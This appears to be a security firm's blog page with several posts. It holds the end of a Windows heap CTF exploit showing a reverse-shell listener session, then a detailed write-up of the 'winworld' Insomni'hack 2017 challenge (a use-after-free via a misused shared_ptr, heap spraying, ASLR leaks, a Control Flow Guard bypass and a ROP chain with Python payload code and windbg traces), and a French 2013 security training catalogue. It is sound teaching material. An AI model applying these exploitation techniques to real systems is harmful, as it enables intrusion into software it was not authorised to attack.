[+] Waiting for connections on Got connection from on port 19227
[+] Opening connection to on port 42003: Done
[+] Spawning shell...

And get the connect-back (here from the CTF server):

$ nc -lvp 1337
listening on [any] 1337 ...
connect to [] from [] 49729
Microsoft Windows [Version 10.0.17763.253]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\winhttpd\inetpub>cd ..
 Volume in drive C has no label.
 Volume Serial Number is F845-3464

 Directory of C:\winhttpd

01/19/2019 01:07 AM <DIR> .
01/19/2019 01:07 AM <DIR> ..
01/19/2019 12:52 AM <DIR> inetpub
01/19/2019 01:06 AM 26,112 winhttpd.exe
01/18/2019 11:01 PM <DIR> wow_gg_the_flag_is_in_here
              1 File(s) 26,112 bytes
              4 Dir(s) 40,418,689,024 bytes free

C:\winhttpd>cd wow_gg_the_flag_is_in_here
C:\winhttpd\wow_gg_the_flag_is_in_here>type flag.txt
INS{HEADs I WIN, tails you lose}

In summary we used 5 requests/threads which we all kept alive throughout the exploit:

  • 1st one leaked the address of the first private heap
  • 2nd leaked NTDLL + the RtlpHeapKey value
  • 3rd leaks the address of the target heap
  • 4th has the target heap, we keep it waiting for a while then trigger a large allocation to get RIP
  • 5th uses a the arbitrary write to overwrite the mangled CommitRoutine pointer with a stack pivot


Of course none of this is really specific to “private” heaps. You can find the same ntdll!RtlpStaticDebugInfo pointer and CommitRoutine callback in the main heap as well 🙂

Unfortunately no team was able to solve the challenge during the CTF, although it appears that several teams were pretty close!
You can find my exploit here and the sources here. It can fail sometimes because of things like occasional NULL bytes in the leaked values, but should work most of the time.

Exploiting a misused C++ shared pointer on Windows 10

In this post I describe a detailed solution to my “winworld” challenge from Insomni’hack CTF Teaser 2017. winworld was a x64 windows binary coded in C++11 and with most of Windows 10 built-in protections enabled, notably AppContainer (through the awesome AppJailLauncher), Control Flow Guard and the recent mitigation policies.

These can quickly be verified using Process Hacker (note also the reserved 2TB of CFGBitmap!):

The task was running on Windows Server 2016, which as far as the challenge is concerned behaves exactly as Windows 10 and even uses the exact same libraries. The challenge and description (now with the source code) can be found here.

Logic of the binary:

Our theme this year was “rise of the machines”; winworld is about the recent Westworld TV show, and implements a “narrator” interface where you can create robots and humans, configure their behavior, and move them on a map where they interact with each other.

The narrator manipulates Person objects, which is a shared class for both “hosts” (robots) and “guests” (humans). Each type is stored in separate list.

Each Person object has the following attributes:

The narrator exposes the following commands:

--[ Welcome to Winworld, park no 1209 ]--
narrator [day 1]$ help
Available commands:
 - new <type> <sex> <name>
 - clone <id> <new_name>
 - list <hosts|guests>
 - info <id>
 - update <id> <attribute> <value>
 - friend <add|remove> <id 1> <id 2>
 - sentence <add|remove> <id> <sentence>
 - map
 - move <id> {<l|r|u|d>+}
 - random_move
 - next_day
 - help
 - prompt <show|hide>
 - quit
narrator [day 1]$

The action happens during calls to move or random_move whenever 2 persons meet. The onEncounter method pointer is called and they interact. Only attack actually has impact on the other Person object: if the attack is successful the other takes damage and possibly dies. Robots can die an infinite number of times but cannot kill humans. Humans only live once and can kill other humans. The next_day feature restores the lives of robots and the health of everyone, but if the object is a dead human, it gets removed from its list.

People talk in an automated way using a Markov Chain that is initialized with the full Westworld script and the added sentences, which may incur in fun conversations. Many sentences still don’t quite make sense though, and since the vulnerabilities aren’t in there, I specified it in the description to spare some reversing time (there is already plenty of C++ to reverse…).

Vulnerability 1: uninitialized attribute in the Person copy constructor

During the Narrator initialization, the map is randomly generated and a specific point is chosen as the “maze center”, special point that when reached under certain conditions, turns a robot into a human. These conditions are that the currently moved Person must be a HOST, have is_conscious set, and there must be a human (GUEST) on the maze center too.

First thing is thus to find that point. All randomized data is obtained with rand(), and the seed is initialized with a classic srand(time(NULL)). Therefore the seed can be determined easily by trying a few seconds before and after the local machine time. Once synchronized with the server’s clock, simply replaying the map initialization algorithm in the exploit will finally allow to find the rand() values used to generate the maze center. Coding a simple pathfinding algorithm then allows to walk any person to this position.

Robots are initialized with is_conscious = false in the Person::Person constructor. However the Person::Person *copy* constructor used in the narrator’s clone function forgets to do this initialization! The value will thus be uninitialized and use whatever was already on the heap. It turns out that just cloning a robot is often enough to get is_conscious != 0… but let’s make sure it always is.

Sometimes the newly cloned robot will end up on the Low Fragmentation Heap, sometimes not. Best is then to make sure it always ends up on the LFH by cloning 0x10 – number of current Person objets = 6. Let’s clone 6+1 times a person and check in windbg:

0:004> ? winworld!Person::Person
Matched: 00007ff7`9b9ee700 winworld!Person::Person (<no parameter info>)
Matched: 00007ff7`9b9ee880 winworld!Person::Person (<no parameter info>)
Ambiguous symbol error at 'winworld!Person::Person'
0:004> bp 00007ff7`9b9ee880 "r rcx ; g" ; bp winworld!Person::printInfos ; g
Breakpoint 1 hit
00007ff7`9b9f0890 4c8bdc mov r11,rsp
0:000> r rcx
0:000> !heap -x 0000024a826800c0
Entry User Heap Segment Size PrevSize Unused Flags
0000024a826800b0 0000024a826800c0 0000024a82610000 0000024a82610000 a0 120 10 busy 

0:000> !heap -x 0000024a82673d70
Entry User Heap Segment Size PrevSize Unused Flags
0000024a82673d60 0000024a82673d70 0000024a82610000 0000024a828dec10 a0 - 10 LFH;busy

Here we see that the first 2 clones aren’t on the LFH, while the remaining ones are.

The LFH allocations are randomized, which could add some challenge. However these allocations are randomized using an array of size 0x100 with a position that is incremented modulo 0x100, meaning that if we spray 0x100 elements of the right size, we will come back to the same position and thus get a deterministic behavior. We don’t even need to keep the chunks in memory, so we can simply spray using a command string of size 0x90 (same as Person), which will always initialize the is_conscious attribute for the upcoming clone operation.

So now our robot becomes human, and the troubles begin!

Note: It seems that by default Visual Studio 2015 enables the /sdl compilation flag, which will actually add a memset to fill the newly allocated Person object with zeros, and thus makes it unexploitable. I disabled it 😉 But to be fair, I enabled CFG which isn’t default!

Vulnerability 2: misused std::shared_ptr

A shared pointer is basically a wrapper around a pointer to an object. It notably adds a reference counter that gets incremented whenever the shared_ptr is associated to a new variable, and decremented when that variable goes out of scope. When the reference counter becomes 0, no more references to the object are supposed to exist anywhere in the program, so it automatically frees it. This is very useful against bugs like Use After Free.

It is however still possible to be dumb with these smart pointers… in this challenge, when a robot becomes human, it stays in the robots list (but its is_enable field becomes false so it cannot be used as a robot anymore), and gets inserted into the humans list with the following code:

This is very wrong because instead of incrementing the reference counter of the object’s shared_ptr, we instead create a new shared_ptr that points to the same object:

When the reference counter of any of the two shared_ptr gets decremented to 0, the object gets freed and since the other shared_ptr is still active, we will get a Use After Free! To do so, we can kill the human-robot using another human. We also have to remove all his friends otherwise the reference counter will not reach 0. Then using the next_day function will free it when it removes the pointer from the guests vector:

So now getting RIP should be easy since the object holds a method pointer: spray 0x100 strings of length 0x90 with a fake object – a std::string can also contain null bytes – and then move the dead human-robot left-right so he meets his killer again, and triggers the overwritten onEncounter method pointer:

def craft_person(func_ptr, leak_addr, size):
 payload = struct.pack("<Q", func_ptr) # func pointer
 payload += "\x00" * 24 # friends std::vector
 payload += "\x00" * 24 # sentences std::vector

 # std::string name
 payload += struct.pack("<Q", leak_addr)
 payload += "JUNKJUNK"
 payload += struct.pack("<Q", size) # size
 payload += struct.pack("<Q", size) # max_size

 payload += struct.pack("<I", 1) # type = GUEST
 payload += struct.pack("<I", 1) # sex
 payload += "\x01" # is_alive
 payload += "\x01" # is_conscious
 payload += "\x01" # is_enabled

payload = craft_person(func_ptr=0x4242424242424242, leak_addr=0, size=0)
for i in range(0x100):
    sendline(s, payload)
sendline(s, "move h7 lr")


0:004> g
(1a00.c68): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00007ffa`89b164ae 488b14c2 mov rdx,qword ptr [rdx+rax*8] ds:010986ff`08d30908=????????????????
0:000> ? rax << 9
Evaluate expression: 4774451407313060352 = 42424242`42424200

Control Flow Guard is going to complicate things a bit, but before that we still need to leak one address to defeat ASLR.

Leaking the binary base address

In the previous code sample we crafted a name std::string of size 0 to prevent the binary from crashing when printing the name. Replacing the pointer and size with valid values will print size bytes at that address, therefore we got our arbitrary read primitive. Now what do we print? There is ASLR everywhere except for the _KUSER_SHARED_DATA at 0x7ffe0000, which doesn’t hold any pointer anymore on Windows 10…

Instead of exploiting our UAF with a string we must therefore replace the freed Person object with another object of the same LFH size (0xa0). We don’t have any, but we can check if we could increase the size of one of our vectors instead.

Iteratively trying with our std::vector<std::shared_ptr<Person>> friends, we get lucky with 7 to 9 friends:

0:004> g
Breakpoint 0 hit
00007ff7`9b9f0890 4c8bdc mov r11,rsp
0:000> dq rcx
000001cf`94daea60 00007ff7`9b9ef700 000001cf`94d949b0
000001cf`94daea70 000001cf`94d94a20 000001cf`94d94a40
000001cf`94daea80 000001cf`94dac6c0 000001cf`94dac760
000001cf`94daea90 000001cf`94dac780 00736572`6f6c6f44
000001cf`94daeaa0 61742074`73657567 00000000`00000007
000001cf`94daeab0 00000000`0000000f 00000002`00000000
000001cf`94daeac0 00000000`20010001 00000000`00000000
000001cf`94daead0 0000003d`00000020 0000000a`00000004
0:000> !heap -x 000001cf`94d949b0
Entry User Heap Segment Size PrevSize Unused Flags
000001cf94d949a0 000001cf94d949b0 000001cf94d30000 000001cf94dafb50 a0 - 10 LFH;busy 

0:000> dq 000001cf`94d949b0
000001cf`94d949b0 000001cf`94dfb410 000001cf`94d90ce0
000001cf`94d949c0 000001cf`94dac580 000001cf`94d90800
000001cf`94d949d0 000001cf`94d98f90 000001cf`94d911c0
000001cf`94d949e0 000001cf`94d99030 000001cf`94d912e0 # string pointer
000001cf`94d949f0 000001cf`94db4cf0 000001cf`94d91180 # string size
000001cf`94d94a00 000001cf`94db7e60 000001cf`94d912a0
000001cf`94d94a10 000001cf`94e97c70 000001cf`94d91300
000001cf`94d94a20 7320756f`590a2e73 73696874`20776f68
0:000> dps poi(000001cf`94d949b0+8+0n24*2) L3
000001cf`94d912e0 00007ff7`9b9f7158 winworld!std::_Ref_count<Person>::`vftable'
000001cf`94d912e8 00000001`00000005
000001cf`94d912f0 000001cf`94d99030

The vector now belongs to the same LFH bucket as Person objects. If  we spray 0xf0 strings followed by 0x10 7-friends vectors we will be able to leak pointers: to a vtable inside winworld and to the heap. We should be able to actually do that with 0xff strings then 1 friends vector, but there appears to be some allocations happening in between sometimes – and I haven’t debugged what caused it.

We don’t control the size though, which is huge, so the binary will inevitably crash! Good thing is that on Windows libraries are randomized only once per boot, as opposed to the heap, stack etc. that are randomized for each process. This is dirty, but since this binary is restarted automatically it isn’t a problem, so we have leaked the binary base and we can reuse it in subsequent connections.

Protip: when you develop a Windows exploit, don’t put the binary on the share to your Linux host, this has the nice side effect of forcing randomization of the binary base at each execution! Call it a mitigation if you want 🙂

Bypassing Control Flow Guard

Control Flow Guard (CFG) is Microsoft’s Control Flow Integrity (CFI) measure, which is based on the simple idea that any indirect call must point to the beginning of a function. A call to __guard_check_icall_fptr is inserted before indirect calls:

On Windows 10 this calls ntdll!LdrpValidateUserCallTarget to check that the pointer is a valid function start using its CFGBitmap of allowed addresses, and aborts if not.

The advantage of CFG is that it can hardly break a legit program (so, no reason not to use it!). However 3 generic weaknesses are apparent in CFG:

  1. The set of allowed targets is still huge, compared to a CFI mechanism that verifies the type of function arguments and return values
  2. It cannot possibly protect the stack, since return addresses are not function starts. Microsoft will attempt to fix this with Return Flow Guard and future Intel processor support, but this is not enforced yet.
  3. If a loaded module isn’t compiled with CFG support, all the addresses within that modules are set as allowed targets in the CFGBitmap. Problems may also arise with JIT. (here the binary and all DLLs support CFG and there is no JIT)

While I was writing this challenge an awesome blog post was published about bypassing CFG, that abuses kernel32!RtlCaptureContext (weakness 1). It turns out that j00ru – only person that solved this task, gg! – used it to leak the stack, but I haven’t, and opted for leaking/writing to the stack manually (weakness 2).

We have abused the std::string name attribute for arbitrary read already, now we can also use it to achieve arbitrary write! The only requirement is to replace the string with no more bytes than the max size of the currently crafted std::string object, which is therefore no problem at all. This is cool, however so far we don’t even know where the stack (or even heap) is, and it is randomized on each run of the program as opposed to the libraries. We will come back to this later on. First we also want to leak the addresses of the other libraries that we may want to use in our exploit.

Leaking other libraries

Using the binary base leak and a spray of 0x100 crafted persons strings we have enough to leak arbitrary memory addresses. We can leave the vectors to null bytes to prevent them from crashing during the call to Person::printInfos.

Now that we have the binary base address and that it will stay the same until next reboot, leaking the other libraries is trivial: we can just dump entries in the IAT. My exploit makes use of ucrtbase.dll and ntdll.dll (always in the IAT in the presence of CFG), which can be leaked by crafting a std::string that points to the following addresses:

0:000> dps winworld+162e8 L1
00007ff7`9b9f62e8 00007ffa`86d42360 ucrtbase!strtol
0:000> dps winworld+164c0 L2
00007ff7`9b9f64c0 00007ffa`89b164a0 ntdll!LdrpValidateUserCallTarget
00007ff7`9b9f64c8 00007ffa`89b164f0 ntdll!LdrpDispatchUserCallTarget

To repeat the leak we can overwrite the onEncounter method pointer with the address of gets(), once we have located the base address of ucrtbase.dll. This is of course because of the special context of the task that has its standard input/output streams redirected to the client socket. This will trigger a nice gets(this_object) heap overflow that we can use to overwrite the name string attribute in a loop.

Leaking the stack

Where can we find stack pointers? We can find the PEB pointer from ntdll, however in x64 the PEB structure doesn’t hold any pointer to the TEBs (that contains stack pointers) anymore…

A recent blogpost from j00ru described an interesting fact: while there is no good reason to store stack pointers on the heap, there may be some leftover stack data that was inadvertently copied to the heap during process initialization.

His post describes it on x86, let’s check if we still have stack pointers lurking on the heap in x64:

0:001> !address
        BaseAddress      EndAddress+1        RegionSize     Type       State                 Protect             Usage
        3b`b6cfb000       3b`b6d00000        0`00005000 MEM_PRIVATE MEM_COMMIT  PAGE_READWRITE                     Stack      [~0; 2524.1738]
0:001> !heap
 Heap Address NT/Segment Heap

 17c262d0000 NT Heap
 17c26120000 NT Heap
0:001> !address 17c262d0000 

Usage: Heap
Base Address: 0000017c`262d0000
End Address: 0000017c`26332000
0:001> .for (r $t0 = 17c`262d0000; @$t0 < 17c`26332000; r $t0 = @$t0 + 8) { .if (poi(@$t0) > 3b`b6cfb000 & poi(@$t0) < 3b`b6d00000) { dps $t0 L1 } }
0000017c`262d2d90 0000003b`b6cff174
0000017c`262deb20 0000003b`b6cffbd8
0000017c`262deb30 0000003b`b6cffbc8
0000017c`262deb80 0000003b`b6cffc30
0000017c`2632cf80 0000003b`b6cff5e0
0000017c`2632cfc0 0000003b`b6cff5e0
0000017c`2632d000 0000003b`b6cff5e0
0000017c`2632d1a0 0000003b`b6cff5e0
0000017c`2632d2c0 0000003b`b6cff5e0
0000017c`2632d4e0 0000003b`b6cff5e0
0000017c`2632d600 0000003b`b6cff5e0
0000017c`2632d660 0000003b`b6cff5e0
0000017c`2632d6e0 0000003b`b6cff5e0
0000017c`2632d700 0000003b`b6cff5e0
0:000> dps winworld+1fbd0 L3
00007ff7`9b9ffbd0 0000017c`2632ca80
00007ff7`9b9ffbd8 0000017c`262da050
00007ff7`9b9ffbe0 0000017c`2632cf20

Yes! We indeed still have stack pointers on the default heap, and we can leak an address from that heap at static offsets from our winworld base address.

Now we can just browse heap pages and try to find these stack addresses. In my exploit for simplicity I used a simple heuristic that finds QWORDS that are located below the heap but also above 1`00000000, and interactively ask which one to choose as a stack leak. This can obviously be improved.

Next step is to dump the stack until we find the targeted return address, craft our std::string to point to that exact address, and use the “update <id> name ropchain” feature to write a ropchain!

Mitigation policies & ROP

Now that we have both an arbitrary write and the exact address where we can overwrite a saved RIP on the stack, all that is left is build a ROP chain. Several ideas to do it:

  • VirtualProtect then shellcode
  • LoadLibrary of a library over SMB
  • Execute a shell command (WinExec etc.)
  • Full ROP to read the flag

As mentioned earlier the binary has some of the recent mitigation policies, in our context the following ones are relevant:

  • ProcessDynamicCodePolicy : prevents inserting new executable memory → VirtualProtect will fail
  • ProcessSignaturePolicy : libraries must be signed  → prevents LoadLibrary
  • ProcessImageLoadPolicy : libraries cannot be loaded from a remote location → prevents LoadLibrary over SMB

The two last options are still available. I also wanted to add a call to UpdateProcThreadAttribute with PROC_THREAD_ATTRIBUTE_CHILD_PROCESS_POLICY in the parent AppJailLauncher process – which would prevent winworld from creating new processes – but since it is a console application, spawning winworld also creates a conhost.exe process. Using this mitigation prevents the creation of the conhost.exe process and therefore the application cannot run.

My solution reads the flag directly in the ROP chain. Since I didn’t want to go through all the trouble of CreateFile and Windows handles, I instead used the _sopen_s / _read / puts / _flushall functions located in ucrtbase.dll that have classic POSIX-style file descriptors (aka 0x3).

Looking for gadgets in ntdll we can find a perfect gadget that pop the first four registers used in the x64 calling convention. Interestingly the gadget turns out to be in CFG itself, which was a scary surprise while single stepping through the rop chain…

0:000> u ntdll+96470 L5
00007ffa`89b16470 5a pop rdx
00007ffa`89b16471 59 pop rcx
00007ffa`89b16472 4158 pop r8
00007ffa`89b16474 4159 pop r9
00007ffa`89b16476 c3 ret

Putting it all together we finally get the following:

Z:\awe\insomnihack\2017\winworld>python getflag remote
[+] Discovering the PRNG seed...
 Clock not synced with server...
[+] Resynced clock, delay of -21 seconds
[+] Found the maze center: (38, 41)
[+] Check the map for people positions
[+] Make sure that LFH is enabled for bucket of sizeof(Person)
6 / 6 ...
[+] Spray 0x100 std::string to force future initialization of pwnrobot->is_conscious
256 / 256 ...
[+] Cloning host, with uninitialized memory this one should have is_conscious...
[+] Removing current friends of pwnrobot...
[+] Moving a guest to the maze center (37, 86) -> (38, 41)...
[+] Moving our host to the maze center (38, 29) -> (38, 41)...
[+] pwnrobot should now be a human... kill him!
[+] Removing all pwnrobot's friends...
7 / 7 ...
[+] Decrement the refcount of pwnrobot's human share_ptr to 0 -> free it
[+] Spray 0x100 std::string to trigger UAF
256 / 256 ...
[+] heap leak: 0x18a6eae8b40
[+] Leaking stack ptr...
[+] Dumping heap @ 0x18a6eae6b40...
[+] Dumping heap @ 0x18a6eae7b40...
[HEAP] 0x18a6eae7b40
 [00] - 0x18a6ea96c72
 [01] - 0x18a6ea9c550
 [02] - 0x18a6ea9e6e0
Use which qword as stack leak?
[+] Dumping heap @ 0x18a6eae8b40...
[HEAP] 0x18a6eae8b40
 [00] - 0x3ab7faf120
 [01] - 0x3ab7faf4f0
 [02] - 0x18a6ea9c550
 [03] - 0x18a6eae84c0
 [04] - 0x18a6eae8560
 [05] - 0x18a6eae8760
Use which qword as stack leak? 1
[+] stack @ 0x3ab7faf4f0
[+] Leaking stack content...
[-] Haven't found saved RIP on the stack. Increment stack pointer...
[-] Haven't found saved RIP on the stack. Increment stack pointer...
[-] Haven't found saved RIP on the stack. Increment stack pointer...
RIP at offset 0x8
[+] Overwrite stack with ROPchain...
[+] Trigger ROP chain...
Better not forget to initialize a robot's memory!

Flag: INS{I pwn, therefore I am!}
[+] Exploit completed.


You can find the full exploit here.

I hope it was useful to those like me that are not so used at to do C++ or Windows exploitation. Again congratulations to Dragon Sector for solving this task, 1h before the CTF end!

Catalogue de formations 2013

Pour 2013 SCRT étoffe à nouveau son catalogue de formations techniques afin de répondre au mieux au monde de la sécurité en perpétuelle évolution, notamment avec les formations sur le développement d’applications pour terminaux mobiles (COD102 & COD103) ainsi que la gestion des logs dans le contexte de la sécurité informatique (FOR102).

Vous trouverez dans la suite de cet article la liste des formations mise à jour. N’hésitez pas à nous contacter pour de plus amples informations.


INF101 – Fortinet

Cette formation prépare au premier niveau de certification Fortinet : le FCNSA (Fortinet Certified Network. Securtiy Administrator).
Profils : Administrateurs systèmes
Pré-requis : N/A
Durée du cours : 1 jour

INF102 – Sécurisation d’infrastructures virtualisées VMware

Ce cours présente les nouveaux risques liés aux architectures virtualisées, ainsi que les bonnes pratiques à adopter dans l’administration de ces environnements.
Profils : Administrateurs système, Administrateurs d’infrastructures VMware ESX
Pré-requis : Connaissances de base VMware ESX
Durée du cours : 1 journée

INF103 – Sécurité windows 7/2008

Cette formation présente les différentes options et bonnes pratiques permettant de mieux sécuriser les systèmes Microsoft Windows 7 & 2008.
Profils : Administrateurs système, RSSI
Pré-requis : Administration Windows
Durée du cours : 1 journée

INF104 – Sécurisation / administration Linux

Découvrez au travers de cette formation les options et outils permettant de sécuriser au mieux un serveur Linux.
Profils : RSSI, chef de projet, administrateur système
Pré-requis : Notions / connaissances de base des systèmes Linux
Durée du cours : 1 journée

INF105 – Sécurité des architectures web

Cette formation présente les fondamenteux de la sécurité des architectures web : sécurité des architectures N tiers, cryptographie, équipements liés à la sécurité des architectures web (firewall, IPS, WAF, …), enjeux et méthodes, protocoles de fédération d’identité… .
Profils : Développeurs, chefs de projet, administrateurs systèmes, RSSI
Pré-requis : N/A
Durée du cours : 1 journée

INF203 – Bootcamp sécurité Windows

Les administrateurs systèmes sont souvent amenés à configurer des points clefs de la sécurité d’un système d’exploitation. C’est en partant de ce constat et pour ainsi les aider à mieux comprendre les fondements de la sécurité du système d’exploitation Windows que nous avons crée cette formation.
Après avoir présenté les fondements de la sécurité du système d’exploitation ainsi que les méthodes pour faire un état des lieux, les points permettant de faire face à une attaque en la comprenant et en sécurisant le système seront abordés.
La pratique ne sera pas oubliée avec des démonstrations et des exercices dans des environnements virtualisés pour illustrer le tout.
Profils : Administrateurs système Windows
Pré-requis : N/A
Durée du cours : 1 journée


HAK101 – Outils et méthodes de hacking – niveau intermédiaire

Cette formation a pour but d’enseigner l’identification et l’exploitation des failles de sécurité les plus courantes. Au travers d’une dizaine d’exercices pratiques, les participants apprendront à déceler et à exploiter des vulnérabilités telles que les injections SQL ou le cross-site scripting. Ils apprendront également à tirer parti d’un serveur mal configuré ou encore à mener une attaque par “brute-force” sur un mot de passe.
Profils : Administrateurs systèmes/réseaux, RSSI, développeurs
Pré-requis : Connaissances basiques HTML, SQL, réseau
Durée du cours : 1 journée

HAK201 – Outils et méthodes de hacking – niveau expert

A l’instar de Outils et méthodes de hacking – Niveau 2, cette formation pratique a pour but d’enseigner la détection et l’exploitation de vulnérabilités réelles. La théorie et les exercices (en environnement de laboratoire) permettront ainsi aux participants de comprendre et de mener des attaques avancées telles que l’exploitation de buffer overflows, l’interception réseau ou encore l’attaque de réseaux sans-fil.
Profils : Administrateurs systèmes/réseaux, RSSI, développeurs
Pré-requis : Outils et méthodes de hacking niveau intermédiaire & connaissances basiques HTML, SQL, réseau
Durée du cours : 1 journée

HAK102 – Nouvelles attaques web

Cette formation présente les nouvelles attaques ciblant plus particulièrement les sites web : Cross site request forgery, click-jacking, attaques navigateur,… .
Profils : Administrateurs systèmes, développeurs, RSSI
Pré-requis : Connaissances des attaques « classiques » telles que XSS, SQLi, …
Durée du cours : ½ journée

HAK202 – Sécurité des nouvelles technologies web

Cette formation présente les nouvelles menaces et attaques sur les technologies récentes du Web : Node.js, bases de données NoSQL, HTML5. Ce cours comprend des exemples pratiques ainsi que des travaux pratiques permettant de mettre en oeuvre et de contrer ces attaques.
Profils: Développeurs, Chefs de projet
Pré-requis: Connaissances de bases sur les technologies web
Durée du cours : 1 journée


COD101 – Secure coding OWASP

Découvrez le TOP10 des failles OWASP, les conseils et solutions pour éviter ces erreurs, ainsi qu’une série d’exemples et conseils adaptés aux langages uilisés par vos équipes (PHP, Java, C, …).
Profils : Développeurs, chef de projet
Pré-requis : Connaissances de base langage sélectionné
Durée du cours : 1/2 à  1 journée

COD102 – Secure coding iOS

Cette formation présente les erreurs de développement pouvant introduire des vulnérabilités lors du développement d’applications pour plateforme iOS en se basant sur le référentiel de l’OWASP mais également notre retour d’expérience d’audits d’applications.
Durée de la formation : 1/2 journée

COD103 – Secure coding Android

Cette formation présente les erreurs de développement pouvant introduire des vulnérabilités lors du développement d’applications pour plateforme Android en se basant sur le référentiel de l’OWASP mais également notre retour d’expérience d’audits d’applications.
Profils: développeurs
Pré-requis: développement et plateforme Android
Durée du cours: 1 journée


FOR101 – Forensics

Formation visant à mieux connaître les outils open-source permettant de
mener à bien une analyse forensique.
Profils : RSSI, administrateurs systèmes
Pré-requis : N/A
Durée du cours : 1 journée

FOR102 – Log management in Depth

Cette formation présente les fondamentaux du log management et de son intégration. Elle regroupe les analyses forensiques, les mises en conformité avec les normes ISO27001, PCI-DSS, HIPAA ainsi que l’exploitation de logs pour le monitoring de service, le troubleshooting et la détection d’intrusion. Profils: RSSI, administrateurs systèmes et réseaux
Pré-requis: N/A
Durée du cours: 1 jour

Sensibilisation utilisateurs

(cette formation n’a pas de thème, elle est seule). Les mesures de sécurité les plus complexes peuvent généralement être déjouées en attaquant le maillon le plus faible de la sécurité de votre système d’information : l’utilisateur. Cette formation, basée sur des démonstrations et exemples concrets, vise à donner les bons reflexes aux utilisateurs. Le contenu de la formation peut être adapté en fonction de vos attentes : Social engineering, code malveillant, réseaux sociaux, utiliteurs nomades, équipements mobiles, attaques de type MiTM, … .
Profils : Utilisateurs finaux
Pré-requis : N/A
Durée du cours : 2 heures

Calendrier des formations 2013
Calendrier des formations 2013